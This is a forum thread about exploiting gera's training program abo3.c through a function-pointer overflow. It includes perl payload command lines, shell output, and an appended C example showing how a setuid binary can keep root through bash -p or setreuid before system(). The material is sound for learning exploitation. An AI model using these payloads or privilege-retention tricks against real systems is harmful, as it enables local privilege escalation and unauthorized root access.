LinuxQuestions.org

LinuxQuestions.org (/questions/)
-   Linux - Security (https://www.linuxquestions.org/questions/linux-security-4/)
-   -   Does system drop privaleges (https://www.linuxquestions.org/questions/linux-security-4/does-system-drop-privaleges-446167/)

NNP 05-18-2006 03:58 PM

Does system drop privileges
 
OK, I'm exploiting a simple program by overwriting a function pointer with the address of system. I am passing "/bin/sh" to that. I had expected to end up with the same privileges as I had before, as I was under the impression that system() executes programs using /bin/sh, which apparently drops privileges. I wasn't disappointed in this regard.
Code:


/* abo3.c                                      *
 * specially crafted to feed your brain by gera */

/* This'll prepare you for The Next Step        */

#include <stdio.h>   /* puts         */
#include <stdlib.h>  /* system, exit */
#include <string.h>  /* strcpy       */

/* gera's original declares the two functions as bare externs
 * ("extern system,puts;") and includes no headers; the includes
 * above replace that line so the file builds on a current compiler.
 * The parameter names are swapped relative to convention: argv is
 * the argument count and argc the argument vector.                  */
int main(int argv,char **argc) {
        void (*fn)(char*)=(void(*)(char*))&system;
        char buf[256];

        fn=(void(*)(char*))&puts;
        strcpy(buf,argc[1]);   /* unbounded copy: overflows buf into fn */
        fn(argc[2]);           /* calls whatever fn now points at, with argc[2] */
        exit(1);
}

Quote:

nnp@torvalds:~/coding/geras/abo$ sudo chmod +s abo3
nnp@torvalds:~/coding/geras/abo$ ls -al
total 40
drwxr-xr-x 2 nnp users 4096 2006-05-18 21:03 .
drwxr-xr-x 3 nnp users 4096 2006-05-18 19:52 ..
-rwsr-sr-x 1 root root 11991 2006-05-18 20:50 abo3
-rw-r--r-- 1 nnp users 219 2006-05-18 19:53 abo3.c
-rwxr-xr-x 1 nnp users 11685 2006-05-18 21:03 test
-rw-r--r-- 1 nnp users 97 2006-05-18 20:05 test.c
nnp@torvalds:~/coding/geras/abo$ ./abo3 `perl -e 'print "\x60\x57\xef\xb7"x68'` "/bin/sh"
sh-3.00$ id
uid=1000(nnp) gid=100(users) groups=6(disk),10(wheel),17(audio),18(video),19(cdrom),100(users)
sh-3.00$
I was then talking to a friend of mine who said I was wrong and that /bin/sh did not drop privs. He showed me his output:

Quote:

$ ls -al ./abo3 ; ./abo3 `perl -e 'print "\xc8\x61\xee\xb7" x 68'` "/bin/sh"
ykram -rwsr-xr-x 1 root root 11771 2006-05-18 15:09 ./abo3
ykram sh-3.00# whoami
ykram root
He is quite adamant that using the same method he ends up with an effective uid of 0. The man page has this to say on the matter:

Quote:

system() will not, in fact, work properly from programs with suid or sgid privileges on systems on which /bin/sh is bash version 2, since bash 2 drops privileges on startup.
Both my friend and I are using the same version, though:
Quote:

nnp@torvalds:~$ /bin/sh --version
GNU bash, version 3.00.16(2)-release (i486-slackware-linux-gnu)
Copyright © 2004 Free Software Foundation, Inc.
nnp@torvalds:~$
Although his doesn't have the Slackware-specific part.

The thing is, if I'm root and run /bin/sh, then in sh run /bin/sh again, the prompt I get is still root, so it's quite obviously not dropping privs then; but if I use the following program it does drop privs. Aghghh!!!!
Code:

nnp@torvalds:~$ ls -al | grep test | grep -v test.c | grep -v contest
-rwsr-sr-x  1 root root    15125 2006-05-19 19:06 test
nnp@torvalds:~$ cat test.c
#include <stdlib.h>

int main() {
        system("/bin/sh");
        return 0;
}
nnp@torvalds:~$ ./test 
sh-3.00$ i
sh: i: command not found
sh-3.00$ id
uid=1000(nnp) gid=100(users) groups=6(disk),10(wheel),17(audio),18(video),19(cdrom),100(users)
sh-3.00$

Also, for some reason, when I run the above program it takes the first letter I type as a command, as if I'd pressed return... odd.


Anyone know what I'm misunderstanding?

primo 05-23-2006 03:29 AM

The abo3.c above spits "Segmentation fault" on my system.

Bash does drop privileges if the EUID != UID. Read the manpage. With the -p option you may turn it off. Obviously on a setuid binary you start with your real UID and the EUID of the executable's owner. A little trickery is needed if you want a root shell.
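Primo's explanation in working code, as an added example that is not part of the thread. It shows the three situations the posts touch on: a plain system() from a setuid-root binary (what abo3 and test.c do, where the "/bin/sh -c" that system() spawns drops the effective uid because it differs from the real uid), a shell started with bash -p, and a system() call made after the program has first set its real uid equal to the effective one. It assumes a root-owned setuid copy of the program, a bash at /bin/bash, and an id binary on PATH; the helper names bash_would_drop_privs, align_real_ids_with_effective and run_with_bash_p are mine, not anything from the thread or from bash.

```c
/* sysdemo.c: added example, not code from the thread.
 * Build and try it (assumes you can make a root-owned setuid copy):
 *   gcc -Wall -o sysdemo sysdemo.c
 *   sudo chown root sysdemo && sudo chmod u+s sysdemo
 *   ./sysdemo
 * Run without the setuid bit, every step just reports your own uid. */
#define _XOPEN_SOURCE 700
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* bash's startup rule (bash(1), -p option): when the real and effective uid
 * differ and -p was not given, the shell sets the effective uid back to the
 * real uid (and the effective gid back to the real gid). */
int bash_would_drop_privs(uid_t ruid, uid_t euid, int started_with_p)
{
    return ruid != euid && !started_with_p;
}

/* Way 1: make the real uid/gid equal to the effective ones before any shell
 * starts, so bash sees no discrepancy.  Returns 0 on success, -1 on failure.
 * For an unprivileged caller uid already equals euid, so this is a no-op. */
int align_real_ids_with_effective(void)
{
    uid_t euid = geteuid();
    gid_t egid = getegid();
    if (setregid(egid, egid) != 0)   /* group first, while euid may still be 0 */
        return -1;
    if (setreuid(euid, euid) != 0)
        return -1;
    return (getuid() == euid && geteuid() == euid) ? 0 : -1;
}

/* Way 2: start the shell in privileged mode (bash -p), which keeps the euid.
 * system() cannot be used for this, because the "/bin/sh -c" it spawns would
 * already have dropped the euid before our command runs; so fork and exec.
 * Returns the child's exit status, or -1 if fork/wait failed (127 if the
 * exec failed, e.g. no /bin/bash). */
int run_with_bash_p(const char *cmd)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execl("/bin/bash", "bash", "-p", "-c", cmd, (char *)NULL);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    printf("process: uid=%u euid=%u\n", (unsigned)getuid(), (unsigned)geteuid());
    printf("bash will drop privileges on a plain system(): %s\n",
           bash_would_drop_privs(getuid(), geteuid(), 0) ? "yes" : "no");

    /* 1. What abo3/test.c do: system() runs "/bin/sh -c id"; with uid != euid
     *    that bash drops the euid first, so "id" reports only the caller's uid. */
    printf("plain system():      ");
    fflush(stdout);
    if (system("id") != 0)
        return 1;

    /* 2. -p keeps the effective uid even though the real uid differs;
     *    "id" now reports euid=0 next to the real uid. */
    printf("bash -p:             ");
    fflush(stdout);
    if (run_with_bash_p("id") != 0)
        return 1;

    /* 3. After aligning the ids there is nothing left for bash to drop. */
    if (align_real_ids_with_effective() != 0) {
        perror("setreuid/setregid");
        return 1;
    }
    printf("after setreuid():    ");
    fflush(stdout);
    return system("id") == 0 ? 0 : 1;
}
```

The point for the exploit in the thread is that both workarounds have to happen before the shell starts: in abo3 the overwritten pointer goes straight to system(), so the outer "/bin/sh -c" has already given up the effective uid by the time the attacker's "/bin/sh" runs, which is the "little trickery" primo refers to.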
